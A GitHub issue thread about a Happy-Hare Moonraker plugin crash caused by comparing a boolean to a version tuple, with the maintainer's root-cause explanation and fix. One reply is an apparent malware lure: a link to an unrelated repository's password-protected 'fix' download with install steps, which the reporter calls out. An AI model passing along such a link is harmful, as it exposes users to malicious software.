moggieuk/Happy-Hare #405: Printer startup moonraker logic error bug (in mmu_server.py)

spikeygg, 2024-08-29:
I recently added SpoolMan to my printer and I've been playing around with it. I just restarted the printer (with a reboot) and when coming up Moonraker complained:
```
Moonraker has failed plugins, please check your logs, update your configuration and restart moonraker.
mmu_server
Moonraker warnings found.
Component 'mmu_server' failed to load with error: '>=' not supported between instances of 'bool' and 'tuple'
Moonraker plugin configuration can be found here.
```

I looked at the code and it does appear to be a logic bug at my inexperienced cursory glance, as MIN_SM_VER is defined as a tuple:
`MIN_SM_VER       = (0, 18, 1)`

and then an if statement tried to compute the boolean of this:
`            if self.spoolman_version >= MIN_SM_VER:`

I restarted moonraker from the web interface and it came up just fine. I'm not sure why it doesn't complain on restart but I'm guessing this portion of code is getting skipped somehow...?

telfaw, 2024-08-29:
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

spikeygg, 2024-08-29:
> to fix your trouble check this fix, i see it in another issue, https://github.com/Jostino/RimWorld-it/releases/tag/fix password: changeme when you installing, you need to place a check in install to path and select "gcc."

nice try dumb ass.

moggieuk, 2024-08-29:
The root cause was that spoolman was not accessible by moonraker, so version number could not be retrieved.  However a "non-version" number is False rather than (x, y, z) so the check failed.  I've push a fix that will avoid the error if spoolman is not available but you are trying to access it.

jwhite, 2024-08-30:
Can confirm fixed in latest version.  Thanks Moggie!

closed 2024-09-05 by moggieuk